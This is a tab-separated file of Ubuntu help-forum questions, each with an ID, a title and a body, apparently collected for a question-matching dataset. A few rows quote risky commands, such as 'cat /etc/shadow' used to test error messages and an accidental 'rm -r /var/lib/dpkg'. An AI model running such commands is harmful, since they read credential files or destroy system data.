383178	update manager in ubuntu 12.04 freezes every time	when the install updates button is pressed in the update manager , the update manager freezes . update and upgrade did not solve the issue . i am getting the following error message : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/defer/__init__.py '' , line 475 , in _inline_callbacks result = gen.send ( result ) file `` /usr/lib/python2.7/dist-packages/aptdaemon/client.py '' , line 1622 , in _run_transaction_helper daemon = get_aptdaemon ( self.bus ) file `` /usr/lib/python2.7/dist-packages/aptdaemon/client.py '' , line 1696 , in get_aptdaemon false ) , file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 241 , in get_object follow_name_owner_changes=follow_name_owner_changes ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 248 , in __init__ self._named_service = conn.activate_name_owner ( bus_name ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 180 , in activate_name_owner self.start_service_by_name ( bus_name ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 278 , in start_service_by_name 'su ' , ( bus_name , flags ) ) ) file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 651 , in call_blocking message , timeout ) dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : launch helper exited with unknown return code 1 traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/defer/__init__.py '' , line 475 , in _inline_callbacks result = gen.send ( result ) file `` /usr/lib/python2.7/dist-packages/aptdaemon/client.py '' , line 1622 , in _run_transaction_helper daemon = get_aptdaemon ( self.bus ) file `` /usr/lib/python2.7/dist-packages/aptdaemon/client.py '' , line 1696 , in get_aptdaemon false ) , file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 241 , in get_object follow_name_owner_changes=follow_name_owner_changes ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 248 , in __init__ self._named_service = conn.activate_name_owner ( bus_name ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 180 , in activate_name_owner self.start_service_by_name ( bus_name ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 278 , in start_service_by_name 'su ' , ( bus_name , flags ) ) ) file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 651 , in call_blocking message , timeout ) dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : launch helper exited with unknown return code 1 dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : launch helper exited with unknown return code 1 traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/defer/__init__.py '' , line 473 , in _inline_callbacks result = gen.throw ( result.type , result.value , result.traceback ) file `` /usr/lib/python2.7/dist-packages/updatemanager/backend/installbackendaptdaemon.py '' , line 52 , in commit downgrade , defer=true ) dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : launch helper exited with unknown return code 1
383180	how install ubuntu on vmware	i want to install ubuntu on vmware , i have downloaded the os file from ubuntu web site , how to go ahead . like for rhel 6 do i have to download an iso image file so as to install it or is there some other unique technique ?
383182	moving a partion to disk `` / '' with gparted	ok so i was trying to update my ubuntu 13.4 to ubuntu 13.10 but i kept getting i did n't have enough free space on disk `` / '' so i got gparted and i have 134 gb how could i move some space from there to disk `` / '' so i could update
383185	i ca n't access my ubuntu server outside of my lan	so i 'll admit right out that i have very little experience with linux . i have been winging this from the get go . i have went through the process of getting a dns server set up and my server can be accessed by the dns name/ip address but only on my lan . what is the cause of this ? a friend told me that i needed to forward ports to the server ip , but when i did that , i still had no luck . i 'm sorry if this is really vague , and i will do my best to answer any questions that you have so you can guide me in the right direction . thank you for any help in advance !
383188	yum install fails on ubuntu ec2 instance	i 'm using ubuntu 12.04.3 on an aws ec2 instance . this is my first time with an ec2 so it 's all new to me . i 'm also not the most experienced linux guy either , so i apologize if this is a stupid question . i want to install a lamp stack on my ec2 instance which i 'm following this tutorial . however , the very first step is to install yum . i made sure to enable ssh , http and https in my security groups . first i typed sudo yum update -y it did n't like that and responded with `` sudo : yum : command not found '' i then just did yum update -y it responded with '' the program 'yum ' is currently not installed . you can install it by typing : apt-get install yum '' . so after typing that to install yum i get the following messages err http : //us-west-2.ec2.archive.ubuntu.com/ubuntu/ precise-updates/main libnss3 amd64 3.14.3-0ubuntu0.12.04.1 403 forbidden err http : //security.ubuntu.com/ubuntu/ precise-security/main libnss3 amd64 3.14.3-0ubuntu0.12.04.1 404 not found [ ip : 91.189.92.202 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3_3.14.3-0ubuntu0.12.04.1_amd64.deb 404 not found [ ip : 91.189.92.202 80 ] e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? considering this is the official tutorial through aws , i 'm not quite sure where to turn . i 'd appreciate some advice/help .
383189	how to play .mpx format video files in ubuntu	i wish to know if there is any video player which supports .mpx format files . on windows these files can be played with a little known syplayer .
383191	can not boot into ubuntu 12.04 lts from windows 8.1	i can not boot into ubuntu on my toshiba satellite , i am able to see ubutu boot screen , but the moment when select the os , it comes up with an error saying there may be a code or file missing . is there a way to fix this without crashing my hard drive , if not how can i uninstall ubuntu from windows ?
383192	where is the memory for ubuntu if whole memory is used for windows	on a computer , during the installation of ubuntu , there are two devices listed : /dev/sda for whole hard disk and /dev/sda1 ( 80gb ) for windows . so the whole memory is used for windows . however , when i checked which os installed to the device from boot menu i saw that they were both windows and ubuntu . if the whole memory is used for windows how there could be ubuntu as well ?
383199	how to increase root space in ubuntu wubi ?	i have installed the ubuntu 12.04 lts using the windows installer after login into root and df -h it shows /dev/loop0 14gb /dev/sda5 50gb here the loop0 is the root folder . how to increase the root folder size to 50gb and decrease the sda5 size to 14gb . can you please help me i am new to ubuntu . thanks in advance .
383200	ubuntu one contacts ?	when , if ever , will you restore the option to sync contacts from let 's say evolution or thunderbird with ubuntu one ? i have never found an answers to the question of why this service was stopped .
383203	what is the meaning of .lnk extension ?	every time when i install and use a windows program using playonlinux / wine , i get a .lnk file on my desktop besides the program 's shortcut . the file 's name is `` program 's name.lnk '' . what is its role and what should i do with it ? is it important ? can i erase it ? i 'm new in this linux stuff , and i suppose that i am asking for information about a windows specific file ( which is kind of ironical thing to ask on a linux-oriented website ) , but , in my old `` windows times '' i do n't remember to deal with such a file . anyway , even if it is somewhere in my system , at least , it was n't appearing on my desktop by itself . anyhow , giving the fact that now i try to run on my os the software specific to other os , i ca n't know what i can keep and what i can erase , and how to manage things in a good way . it is already enough that some of the windows programs simply do n't run properly under linux , i do n't wont to make things any worse .
383205	can i again reinstall java on ubuntu ? because both windows and ubuntu is in my system and java is configured on windows ?	iam new to ubuntu . i have been working on windows . my question is can we run web application developed in windows on ubuntu ? both windows and ubuntu is installed in my system java is congigured on windows . shall i again re instal java mysql and tomcat on ubuntu ? please help . thanks in advance
383206	`sudo apt-get update` lock error on a fresh 12.04 install ( different angle )	my question ( s ) are related to the sequence of the following actions : i ) i performed a fresh installation of 12.04 on a machine ii ) after the installation was complete and the media ( optical disk ) were removed ( as per the prompt ) , i rebooted the machine and logged in into the brand-new system . iii ) i opened a terminal and tried to do an update of apt 's cache ( sudo apt-get update ) . this results in apt-get reporting an error due to some conflict it detects ( indicated by the /var/lib/apt/lists/lock file being locked by some other application ) this question ( or related questions ) seems to have been asked several times and one ( plausible ) post explains the error as having been caused by some updating software such as software center or synaptic already running . is this systematic ( i.e . part of the installation process ) ? is the system trying to run synaptic after a fresh installation ( ... perhaps as some automated post-installation sequence which runs on initial log-in ) ? did i get the lock error for apt-get update because i was inadvertently interfering with another instance of apt-get or similar which gets started immediately after the first log in of a user after a fresh installation ? in short i would like to understand why this happened , because as outlined above , after the installation and my firs log-in , i did not launch or start any apps . > other < than the terminal ( ... .from previous experience with the synaptic package i knew that if you intend to use apt-get you must make sure synaptic is not running.. ) . note : you only seem to get this when you try to run sudo apt-get from one of the pseudo terminals within the x windowing system . you do n't get the lock error if you use one of the virtual terminals ( the character based ones you get by doing 'ctrl+alt+f ( 1-6 ) ' ) . exact error messages ( added at request from one of the commenters @ sushantp606 ) : e : could not get lock /var/lib/apt/lists/lock -open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/
383210	installing ndiswrapper-dkms on ubuntu 12.04	every time i try to install ndiswrapper-dkms , i get a crash report saying , title : `` ndiswrapper-dkms 1.57-1ubuntu1 : ndiswrapper kernel module failed to build '' dkmsbuildlog : `` dkms make.log for ndiswrapper-1.57 for kernel 3.8.0-33-generic ( x86_64 ) -date and time- can not find kernel build files in /usr/src/linux-headers-3.8.0-33-generic please give the path to kernel build directory with the kbuild= argument to make make : [ config_check ] error 1
383213	backporting qt 4.8.4 : circular dependencies of qtchooser	i 'm trying to backport the latest qt packages ( 4.8.4 ) to precise , using launchpad . this worked well for the qt4-x11 packages but now i also need qtchooser which does not exist in 12.04 . trying to build it on launchpad , all builds fail , as it seems due to the following circular build dependency : qtchooser - > libqt4-dev - > qt4-default - > qtchooser the build log can be seen here . is there any way to work around or properly resolve this issue ? my final goal would be to also backport the latest shiboken and pyside packages .
383216	enhanceio : write-through vs read-only	i have installed an enhanceio ssd cache on my notebook . enhanceio supports three caching modes : read-only , write-through , and write-back . read-only caching mode causes enhanceio to direct write io requests only to hdd . read io requests are issued to hdd and the data read from hdd is stored on ssd . subsequent read requests for the same blocks are carried out from ssd , thus reducing their latency by a substantial amount . in write-through mode - reads are handled similar to read-only mode . write-through mode causes enhanceio to write application data to both hdd and ssd . subsequent reads of the same data benefit because they can be served from ssd . write-back improves write latency by writing application requested data only to ssd . this data , referred to as dirty data , is copied later to hdd asynchronously . reads are handled similar to read-only and write-through modes . my cache has default type of write-through . i am thinking that read-only mode should be almost the same fast and would save my ssd from degrading , because of avoiding unnecessary writes to it . am i correct ?
383220	ca n't access phpmyadmin	how can i access my phpmyadmin . i got the following error message : error mysql said : documentation # 2002 - the server is not responding ( or the local mysql server 's socket is not correctly configured ) connection for controluser as defined in your configuration failed .
383222	problem installing pydev and sdk installation in eclipse	i was trying to install pydev and sdk in eclipse , and i got this error : org.eclipse.equinox.p2.core.provisionexception unable to read repository at http : //pydev.org/updates/content.xml
383225	are there any security problems to running an http server using python 's built in module ?	i have a presentation to make to a few people . it 's interactive with python cgi scripts . are there any security problems with using python3 -m http.server -- cgi 8000 ? each person will be using their own computer to access this server ( which is pointed at my computer 's network ip ) and my form entries are all properly escaped .
383226	pass arguments which has spaces to new protocol	i have created new protocol handler for opening application through web pages where a link will open installed application like terminal/chrome etc as suggested in : ( is it possible to open an ubuntu app from html ? ) , in my case its nautilus file browser.. worked perfectly w/o any arguments , however when i pass arguments like 'app : //nautilus /home/user/dir/my dir/ ' ( argument has space in it , it fails even tried escape sequence ( '\ ' ) for space , no luck . here , i am trying to open directories in random sequence where i can not create symbolic link for each of directories . can some one help me how to pass arguments which has spaces to new created protocol ? any help appreciated , thanks in advance . tried creating a shell script test.sh which has just nautilus $ @ , and nautilus `` $ @ '' and ran test.sh `` /home/usr/dir/my\ dir '' and all above combination , but no luck
383231	can not find awesome de log in icon	i have just installed awesome de on ubuntu 13.04 . i logged out , but just found gnome , gnome ( no effect ) , gnome ( 3d ) . what 's wrong ? i tried sudo apt-get install awesome-de again , it returns i have installed awesome de .
383232	dualboot ubuntu 12.04.3 in efi mode with pre-installed windows 8	i have laptop with pre-installed windows 8 in efi mode . so i should install ubuntu in efi mode . i have one empty partition and i wish to use that for ubuntu . i want to know the procedure to install ubuntu in efi mode which will allow me to use both windows 8 and ubuntu without harming windows .
383233	ubuntu 13.10 on hp 650 notebook , no bluetooth , unstable wlan connection	i have installed ubuntu 13.10 on a hp 650 laptop . everything works fine except for two things : the bluetooth hardware is simply not recognized the wlan works poorly . the wlan is recognized and i can enter the required code , but there is no stable connection . on an older hp 635 laptop , ubuntu 12.04 works fine .
383234	not able to install from ubuntu software center	not able to install any software from ubuntu software center . there is no response after pressing install button . the error which i get traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/defer/init.py '' , line 475 , in _inline_callbacks result = gen.send ( result ) file `` /usr/lib/python2.7/dist-packages/aptdaemon/client.py '' , line 1622 , in _run_transaction_helper daemon = get_aptdaemon ( self.bus ) file `` /usr/lib/python2.7/dist-packages/aptdaemon/client.py '' , line 1696 , in get_aptdaemon false ) , file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 241 , in get_object follow_name_owner_changes=follow_name_owner_changes ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 248 , in init self._named_service = conn.activate_name_owner ( bus_name ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 180 , in activate_name_owner self.start_service_by_name ( bus_name ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 278 , in start_service_by_name 'su ' , ( bus_name , flags ) ) ) file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 651 , in call_blocking message , timeout ) dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : launch helper exited with unknown return code 1 traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/defer/init.py '' , line 475 , in _inline_callbacks result = gen.send ( result ) file `` /usr/lib/python2.7/dist-packages/aptdaemon/client.py '' , line 1622 , in _run_transaction_helper daemon = get_aptdaemon ( self.bus ) file `` /usr/lib/python2.7/dist-packages/aptdaemon/client.py '' , line 1696 , in get_aptdaemon false ) , file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 241 , in get_object follow_name_owner_changes=follow_name_owner_changes ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 248 , in init self._named_service = conn.activate_name_owner ( bus_name ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 180 , in activate_name_owner self.start_service_by_name ( bus_name ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 278 , in start_service_by_name 'su ' , ( bus_name , flags ) ) ) file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 651 , in call_blocking message , timeout ) dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : launch helper exited with unknown return code 1 dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : launch helper exited with unknown return code 1 edit 1 new errors after running the command given in the answer . i tried with sudo too . a part of the error code removing /usr/local/lib/python2.7/dist-packages/setuptools-1.4.1-py2.7.egg copying setuptools-1.4.1-py2.7.egg to /usr/local/lib/python2.7/dist-packages setuptools 1.4.1 is already the active version in easy-install.pth installing easy_install script to /usr/local/bin error : /usr/local/bin/easy_install : permission denied something went wrong during the installation . see the error message above .
383240	i would like to create two bootable installations of ubuntu on two separate drives	i already have a bootable version of ubuntu . i would like to add another hardrive and install another bootable instance of ubuntu on the second drive .
383241	direct lan connecting of two servers	i 've connected two servers with cross lan cable . i set the first ethernet port as 10.10.10.1 255.255.255.0 and second as 10.10.10.2 255.255.255.0 however , the servers do not ping to each other . what i missed ?
383242	can not install icedtea java plugin	i can not install the icedtea java browser plugin to run java applets . it shows some error message as given in the attachment . please help me solve this error . it shows this error message : package dependencies can not be resolved .
383243	edit an existing .m file in octave environment	i tried to open an existing file hw3.m in octave environment with edit hw3.m . it opens an empty file with gedit which is the editor i use . i checked if the file is there with what and yes it is there . how can i open that file ?
383244	lubuntu wo n't boot on my laptop	recently i tried to boot lubuntu on my laptop , but it just stopped after i clicked the install opiton . i later tried to boot win xp , and it worked . what could be the problem ?
383247	install ubuntu 13.10 on my notebook	it 's ovi from bangladesh . i want to install ubuntu 13.10 on my notebook which is compaq cq-41 209-tu . on the official site i find drivers only for windows . what after installing ubuntu ? without drivers i ca n't use wifi , lan , bluetooth , the webcam . what should i do ? please help ... .
383252	giving www-data access to files with 750 permissions	i have a situation where i want to prevent users of the system to browse each other 's home dirs . so all home dirs have 750 permissions , instead of 755 . some users have www folders where they host sites , so www-data still needs to have access . so my solution is to make www-data a member of the groups of those users , since in debian each user has its own group . so if usera is hosting content on /home/usera/www/ , then /home/usera will have 750 permissions . and then i do : adduser www-data usera problem is , it does't work . when accessing the sites from a browser i get `` forbidden '' . i tried to run su www-data as root , and as www-data i was able to browse the contents of /home/usera/www/ . so i do n't understand why i still get `` forbidden '' . any ideas ?
383253	how to hide the `away` buddies in pidgin ?	how to hide the away buddies in pidgin ? i use pidgin for managing multiple accounts and it would be really nice to hide the away buddies .
383254	how to define shortcut-keys for executing certain applications ?	how can i define shortcut-keys for executing certain applications ? like opening terminal when pressing ctrl+t or opening gedit when pressing ctrl+g .
383256	which ubuntu version is suitable for my laptop ?	i 'm using an older laptop . my laptop configuration is as follows , intel celeron processor 2.00 ghz 2 gb of ram 80 gb of hard disk
383259	grep on -- help does n't work on some commands	i just wondered why you ca n't grep on some -- help commands . for example if i use ifconfig -- help | grep unix it still prints the whole help instead of the line with unix . but on grep -- help | grep null it works fine .
383261	after upgrading to 13.10 sound recorder is not responding	after upgrading to 13.10 sound recorder is not responding if there is any workaround for this , please let me know . i have seen almost all the question regarding this and tried everything but nothing worked out , i feel there are many peoples suffering through the same problem . i am not able to record through audacity too .
383263	suspected problems with bootloader and windows 8	so by now this question has probably been asked a hundred times , but i figured i might as well ask it again to get some details on my specific situation . so far i have been using linux ( mostly ubuntu ) on and off for years , this means i have some knowledge about the basics but not any extensive knowledge about any advanced functions and so on . when i finally bought a new laptop this year i was looking forward for the storage space to dual boot windows 8 and ubuntu ( my old one has about 80gb storage and strugles running any fancy gui in ubuntu ) . from earlier my experience with linux is almost exclusively to my desktop pc , this means that i was not aware of the restrictions in uefi and secureboot on modern laptops . a few months back i tried installing ubuntu 13.04 aside windows 8 but i could only get one of them working at a time , i installed windows first and then ubuntu to let grub overwrite the windows bootloader like i 'm used to from earlier . this did not seem to work and as it is i tried formating all my disks and installing over along with a bunch of stuff that in the end just made things worse . as it is now i only run windows 8.1 , but to get it to go any further than the boot select i have to enable the secure boot . this makes me think that there might be some traces of grub left on my computer stopping it from fully working with either ubuntu or windows . hopefully someone has a clue as to what can be wrong with my computer , and whether or not it can be fixed .
383267	ubuntu 12.04 lts installation on external hard drive : failed to install grub in the boot drive	i 'm new to ubuntu/linux environments and trying to install ubuntu on an external usb hard drive . i 'm installing it from a usb stick and not live cd . i created four partitions : a 700 mb boot partition ( mount point /boot and file system ext4 ) a ~100 gb etx4 partition ( mount point / ) a 500 mb swap partition the rest of 3 tb is fat32 windows partition . installation seems to go through fine . however it fails with the fatal error that it could n't install grub to /dev/sdc5 ( which is the /boot partition mentioned above ) . i 'm just interested in getting ubuntu to boot and run from the external hard drive . can anyone suggest how to either make the external hard drive bootable for ubuntu or a better way to ensure complete successful installation ? or any other suggestion which will let me boot from external hard drive .
383273	how to get localized error messages ?	i 'm trying to see localized error messages . however , i only seem to get the message from the default `` c '' locale . e.g . $ cat /etc/shadow cat : /etc/shadow : permission denied $ locale -a|grep fi fi_fi.utf8 $ lc_messages=fi_fi.utf8 cat /etc/shadow cat : /etc/shadow : permission denied furthermore , looking at the ltrace output of cat it does call setlocale ( lc_all , `` '' ) , and prints the error message with the glibc error ( ) function ( which prints the error message returned by strerror ( ) , which should be a localized message ) . looking at the strace output of `` lc_messages=fi_fi.utf8 cat /etc/shadow '' one sees that it tries to open the libc message catalog , but for the english locale rather than fi_fi.utf8 : ... open ( `` /usr/share/locale/en_us/lc_messages/libc.mo '' , o_rdonly ) = -1 enoent ( no such file or directory ) open ( `` /usr/share/locale/en/lc_messages/libc.mo '' , o_rdonly ) = -1 enoent ( no such file or directory ) open ( `` /usr/share/locale-langpack/en_us/lc_messages/libc.mo '' , o_rdonly ) = -1 enoent ( no such file or directory ) open ( `` /usr/share/locale-langpack/en/lc_messages/libc.mo '' , o_rdonly ) = -1 enoent ( no such file or directory ) ... i do have a file /usr/share/locale-langpack/fi/lc_messages/libc.mo which contains the libc message catalog for the fi_fi.utf8 locale , however , it does n't seem to be used . packages language-pack-fi , language-pack-fi-base are both installed ( as are the corresponding gnome and kde language packs , but i ca n't see them being relevant here ) . what am i missing ?
383274	problem with wget in vps	i install ubuntu-server 12.4 on my vps . i want to install virtualmin . when i trying to download [ virtualmin ] install.sh with wget , i saw this : : /tmp # wget http : //software.virtualmin.com/gpl/scripts/install.sh -- 2013-11-27 23:26:03 -- http : //software.virtualmin.com/gpl/scripts/install.sh resolving software.virtualmin.com ( software.virtualmin.com ) ... failed : temporary failure in name resolution . wget : unable to resolve host address `software.virtualmin.com' what 's the problem ? and how can i fix it ? thanks
383275	how to open gui folder manager in awesome wm ?	i have installed awesome several hours ago . i do not know how to open folders in gui . how to open graphical folder manager in awesome wm ? i mean the default gui folder in awesome wm .
383276	ubuntu infinite loading	i am new here , so i would highly appreciate your help . i have ubuntu 13.04 . i 've had a swap partition i created earlier , so hibernation worked well for my dell vostro v131 . last time when i used my ubuntu i opened a terminal and entered : sudo hibernate it responded me with the following : hibernate is not installed . to install it , type sudo apt-get install hibernate ( i do not have a menu option for this ) well , i typed it in and it seemed successful . but now , when i try to open my ubuntu , it loads , loads , loads and nothing happens . when i press esc , it says : resume : libgcrypt version : 1.5.0 and nothing all . i do not really want to re-install it again , just because there are some useful files and programs and it took me some time to install them . with best regards , artem ushakov
383279	problem with audio playback with skype	i 'm using ubuntu 12.04 on my sony vaio . when i 'm trying to call on skype , it is showing me problem with audio playback . and the call gets disconnected automatically .
383281	hotot twitter client : search fails	in the desktop version of hotot 0.9.8.14-0 , search views fail with http 406 , 'reason : not acceptable ' ( ubuntu 13.04 ) . the api url for searches is https : //twitter.com/phoenix_search.phoenix is there a way to have functional search views , other than moving to another program ?
383282	ubuntu 12.04 randomly freezes on thinkpad t430	originally i had an ubuntu 12.04 running smoothly on dell vostro v130 . then , i changed my laptop and thus used clonezilla to copy the whole partition image to a newly created partition on my new computer ( t430 ) . my computer comes with 4g of ram , and i added extra 4g of ram . i realize that since i switched to my new laptop , my system randomly freezes , even when the system load is not intensive ( cpu around 5 % , load around 0.10 ) . and , another curious thing is that if i play any audio at background , then when my computer freezes , the last half second of sound repeats in an endless loop until i forcibly cut the power . since it 's my first time to ask a question here , i do n't know whether the information provided is enough . i would really want someone to guide me fixing the annoying issue . what i tried so far : fsck on my ext4 partition = > ok. memtest86+ = > ok for 1 pass . when frozen , reisub does n't work .
383283	maas in high availability	i recently deployed a maas/juju environment based on a six nodes cluster , using ubuntu 12.04 lts , to run a `` proof of concept '' . i could appreciate how interesting the architecture is , and i 'd like to understand if i can really base my future business on this technology . therefore i 'd like to understand more about any involved limitations , constraints and necessities . in particular i 'd like to understand how can maas be made high availability , i.e . deployed over two or more physical nodes able to fail-over ?
383284	intel video card ( i5 ) can not handle two displays using 13.10	when i upgraded to 13.10 ( from 13.04 ) and the second display is unusable since than . lspci : 00:02.0 vga compatible controller : intel corporation xeon e3-1200 v2/3rd gen core processor graphics controller ( rev 09 ) settings > displays shows only a single display , while i see the same content on both monitors . one is attached with analogue vga , the other one with dvi ( i have also tried the hdmi output - with same result ) .
383286	ubuntu 13.10 has exerienced a internal error	my ubuntu 13.10 is showing an error message every time when i switch on my laptop..earlier i had ubuntu 13.04 and it was also showing some error messages ... so i decided to update to latest version which ended like this what should i do to prevent seeing this.. here is the screenshot..someone please help me
383287	ubuntu 12.04lts	an unsolvable problem occurred while initializing the package information . please report this bug against the update-manager package and include the following error message : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/hp.archive.canonical.com_updates_dists_precise-stella-yuli_public_i18n_translation-en , e : the package lists or status file could not be parsed or opened .
383288	ubuntu 13.10 is installed on vm ware workstation under virtual machine	i have installed ubuntu 13.10 on vmware workstation 8 under add virtual machine . i have navigated to me asking to enter full name , user id , pwd and after it has showed all the process of installation and at the end it was showing cmd prompt screen where it is asking `` ubuntu login '' . i have waited for 1hour but nothing happened and i am able to see same cmd prompt screen only .
383291	how to import and export database from sql server to mysql server vice versa in mono2.2 with gtksharp2.10 in ubuntu ?	hy , i am new guy in mono developer . i m using mono developer 2.2 with gtk # 2.0 . i want develop desktop application in mono . i have to import database which having in sql server on web server and i want to import that data in my mysql server with mono+gtksharp ( gtk # 2.10 ) than store it , and after some process in database , i want export database in mysql server to sql server . i donât know to do this and i donât have work with json and xml . i do n't want update system . my application is require by client in ubuntu 10.4lts . sorry for my bad english . thanks for giving your time for reading my question .
383295	multiple juju environments on the same cluster	i recently deployed a maas/juju environment based on a six nodes cluster , using ubuntu 12.04 lts , to run a `` proof of concept '' . i could appreciate how interesting the architecture is , and i 'd like to understand if i can really base my future business on this technology . therefore i 'd like to understand more about any involved limitations , constraints and necessities . in particular i 'd like to understand if the same physical cluster can host multiple juju environments , assuming openstack/virtualization is not used thank you
383297	active directory / map network drive / likewise-open	the situation : windows active directory with a domain , users have specific private network drives automatically mapped onto their machine , when they log in on a windows machine . i want to achieve the same with the ubuntu desktops . how to do that ? another problem is that the home directories arent private . if i log into user1 logout and log in as user2 . i can see home/likewise-open/user1 and home/likewise-open/user2 and i can access both from each account .
383301	how to publish my project on the software center ?	i have a project which enable to execute commands with the voice , sbire . how can i publish it on the ubuntu 's software center ?
383303	rhythmbox shows the same songs twice !	rhythmbox music player displays the same songs twice . each song is repeated in the list . i ca n't remember , but i think this problem started after i changed the music library location settings . however , there 's no repetition when i expand the music item on sidebar and select one of the subsections . i 'm using rhythmbox v2.96 on ubuntu 12.04 lts .
383306	can i partition windows and ubuntu and have the same data in them ?	i have windows 7 32-bit , and i want to have ubuntu as a partition . my question is that i have some files in windows that i also want on ubuntu , is this possible ? ? and if possible then how ?
383312	how to install skype on ubuntu 13.10 64-bit ?	since there is no skype package in default repo , how can i install skype in ubuntu 13.10 saucy 64-bit ?
383315	error while installing update	i am very new to ubuntu . i have installed today only . i tried to update software by typing comnmand in terminal as pranay @ hom-lnx : ~ $ sudo apt-get update & & sudo apt-get upgrade [ sudo ] password for pranay : after giving password i am getting this error e : could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/ e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? i tried to search on forum but could not find helpful link..please provide some suggestion
383316	starting gdm without nolisten tcp option	can i start ubuntu 13.04 gdm without -nolisten tcp option ?
383320	upgrade from ubuntu server 12.10 to 13.04	what commands would i use to upgrade from ubuntu server 12.10 to 13.04 ?
383321	how to browse windows network in ubuntu 13.10 ?	while trying to access a windows network it shows : unable to access location , failed to retrieve share list from server , no such file or directory how to solve this , and connect with windows shared folders ?
383323	display power management not working in 13.10	i noticed that my display , under 13.10 , was no longer shutting down ( go to standby ? ) after 10 minutes ( the setting i use in system settings > brightness & lock ) . i decided to try xscreensaver instead , so i removed gnome-screensaver and installed xscreensaver . still the screen does n't go to standby after the set time . xset seems to be saying that it should work - i.e . the settings show up there under dpms e.g . dpms ( energy star ) : standby : 600 suspend : 600 off : 600 dpms is enabled monitor is on
383331	script that delete files after 5 days	is it possible to make a script that will delete files in a specific folder , after five days without deleting the folder ( s ) . i am using ubuntu server 12 without gui interface .
383335	the upper right corner volume button can no longer be control the music player	my initial use ubuntu 13.10 ( 64bit ) , just installed it can open the music player from here . now i can not . i have now had the gnome desktop , but i 've now uninstalled . i 've been using rhythmbox . how to fix this ? .
383339	how to recover deleted `` dpkg '' directory ?	unfortunately i 've deleted dpkg directory while removing the lock . by mistake i typed root @ sam : ~ $ rm -r /var/lib/dpkg now when i am trying to install/uninstall packages it shows me following error . e : could not open lock file /var/lib/dpkg/lock - open ( 2 : no such file or directory ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? i am using ubuntu desktop 12.04 64-bit os . what should i do now ? please suggest .
383346	how do i get add-apt-repository to work through a proxy ? ( i am using virtual machine )	actually i am doing swift in my virtual machine.. when i am enter this command `` how do i get add-apt-repository to work through a proxy ? '' i got these errors traceback ( most recent call last ) : file `` /usr/bin/add-apt-repository '' , line 88 , in < module > ppa_info = get_ppa_info_from_lp ( user , ppa_name ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/ppa.py '' , line 86 , in get_ppa_info_from_lp return json.loads ( lp_page ) file `` /usr/lib/python2.7/json/__init__.py '' , line 326 , in loads return _default_decoder.decode ( s ) file `` /usr/lib/python2.7/json/decoder.py '' , line 366 , in decode obj , end = self.raw_decode ( s , idx=_w ( s , 0 ) .end ( ) ) file `` /usr/lib/python2.7/json/decoder.py '' , line 384 , in raw_decode raise valueerror ( `` no json object could be decoded '' ) valueerror : no json object could be decoded how to solve this issue in my virtual machine ? ? ?
383349	ubuntu 13.10 , perl complaining about setting locale	i 'm getting rather annoyed with ubuntu 13.10 . i need to go about fixing locales on my server , or else i see junk like this happening : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lc_ctype = `` utf-8 '' , lang = `` en_us.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . most fixes online state that adding export lc_all=en_us.utf-8 export lc_ctype=en_us.utf-8 export lang=en_us.utf-8 to .bashrc and .bash_login should fix the problem . some mention that running the following from the commands : $ sudo locale-gen en_us en_us.utf-8 $ dpkg-reconfigure locales should also help . i also tried rebooting the server on top of all the above . it seems to work for when i 'm ssh'ed into that server via terminal , but when i run remote deployment scripts from capistrano , i still get the perl errors in my output . i thought that 's exactly what the exports in .bash_login should have fixed . i even tried running apt-get install language-pack-en-base nothing works !
383352	command to convert an upper-case string to lower-case ?	what is the bash command i can use to convert an upper-case string to lower-case and vice-versa ? thank you .
